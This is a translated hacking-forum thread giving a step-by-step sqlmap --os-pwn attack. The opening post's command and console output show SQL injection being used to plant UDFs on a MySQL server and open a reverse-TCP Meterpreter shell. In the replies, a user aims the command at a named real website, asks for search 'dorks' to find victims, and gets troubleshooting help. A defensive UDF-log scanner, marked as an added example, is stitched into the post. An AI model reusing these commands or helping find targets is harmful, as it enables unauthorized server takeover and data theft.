Integrating SQLMAP with METASPLOIT
Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) - Forum: Metasploit - Thread: /thread-4127.html
Integrating SQLMAP with METASPLOIT - zee eichel - 12-06-2012

As a framework, Metasploit is able to integrate with various other tools .. as an example, this time I will integrate Metasploit with sqlmap, a tool for analyzing vulnerabilities in SQL databases :-bd

For tutorials on sqlmap .. you can look at http://indonesianbacktrack.or.id/forum/search.php?action=results&sid=f0fdce9f5e744ca3b7a346873a5a69df&sortby=&order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

For now, sorry, I am using dracos linux as the example ... you can adjust it to your own pentest OS.

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

Code:
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06

and the meterpreter opens ..
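From the defender's side, the server-visible step in the output above is the creation of the UDFs 'sys_bineval' and 'sys_exec' from a binary UDF file. The following is an added example, not part of the original post: it scans MySQL query-log lines for UDF registration (`CREATE FUNCTION ... SONAME`) and for calls to those two names. The log layout, the sample lines, the library names and the names `find_udf_activity` and `SAMPLE_LOG` are constructed assumptions.

```python
import re

# UDF names taken from the sqlmap output in the post above.
KNOWN_UDFS = {"sys_exec", "sys_bineval"}

# MySQL registers a UDF with:
#   CREATE [AGGREGATE] FUNCTION name RETURNS type SONAME 'library'
CREATE_UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(?P<name>\w+)`?"
    r"\s+RETURNS\s+\w+\s+SONAME\s+'(?P<lib>[^']+)'",
    re.IGNORECASE,
)
# A call to one of the known UDFs inside any statement.
CALL_UDF = re.compile(r"\b(?P<name>sys_exec|sys_bineval)\s*\(", re.IGNORECASE)

# Constructed sample lines in a general-query-log-like layout (assumption).
SAMPLE_LOG = """\
121206 12:10:11    42 Query     SELECT VERSION()
121206 12:10:13    42 Query     CREATE FUNCTION sys_bineval RETURNS int SONAME 'libsabcd.dll'
121206 12:10:15    42 Query     CREATE FUNCTION sys_exec RETURNS int SONAME 'libsabcd.dll'
121206 12:10:20    17 Query     CREATE FUNCTION geo_dist RETURNS real SONAME 'geo.dll'
121206 12:10:48    42 Query     SELECT sys_bineval('<redacted>')
121206 12:11:02    17 Query     SELECT title FROM news WHERE id=1
"""

def find_udf_activity(log_text):
    """Return findings as (line_no, severity, kind, udf_name, library)."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = CREATE_UDF.search(line)
        if m:
            name = m.group("name").lower()
            # Known names are high severity; any other UDF
            # registration still deserves a manual review.
            severity = "high" if name in KNOWN_UDFS else "review"
            findings.append((line_no, severity, "create", name, m.group("lib")))
            continue
        m = CALL_UDF.search(line)
        if m:
            findings.append((line_no, "high", "call", m.group("name").lower(), None))
    return findings

if __name__ == "__main__":
    for finding in find_udf_activity(SAMPLE_LOG):
        print(finding)
```

Registered UDFs are also recorded in the `mysql.func` table, so an unexpected row there is worth investigating even when query logging is off.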

RE: Integrating SQLMAP with METASPLOIT - ardian - 12-06-2012

Awesome, bro zee.. I'm giving you a thanks for this,, hehehe

RE: Integrating SQLMAP with METASPLOIT - Clound_Carbelius - 12-06-2012

I don't quite get it, bro ( (
bro, bro, \m/ I ran this

Quote: ./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

A question came up like the one in this picture, and then Msf didn't come up

RE: Integrating SQLMAP with METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't quite get it, bro ( (

It looks like the document file of your website isn't quite right, clound, :d

RE: Integrating SQLMAP with METASPLOIT - Clound_Carbelius - 12-06-2012

(12-06-2012, 05:45 PM)czeroo_cool Wrote: (12-06-2012, 05:01 PM)Clound_Carbelius Wrote: bro, bro, \m/

Hmm, I see :-bd share a Dork with me, bro, please :d :-?

RE: Integrating SQLMAP with METASPLOIT - zee eichel - 12-06-2012

What's off is the metasploit path, bro, that's wrong .. is that really the path?

RE: Integrating SQLMAP with METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:57 PM)zee eichel Wrote: What's off is the metasploit path, bro, that's wrong .. is that really the path?

The folder can simply be changed @Clound ... Just look for an ASP dork, bro..

RE: Integrating SQLMAP with METASPLOIT - koecroet - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't quite get it, bro ( (

That's because your target is Linux, and it looks like you entered the wrong folder location. You have to know where the victim website's directory is located on the filesystem; on Linux the default is "/var/www/", you know.

RE: Integrating SQLMAP with METASPLOIT - [H2] - 12-06-2012

Whoa, this is cool, bro.. so if you want to look for tables, columns and dump, how does that work, are the commands still the same as in sqlmap...???

RE: Integrating SQLMAP with METASPLOIT - cyberking - 12-07-2012

Hahaha, alhamdulillah, I learned something again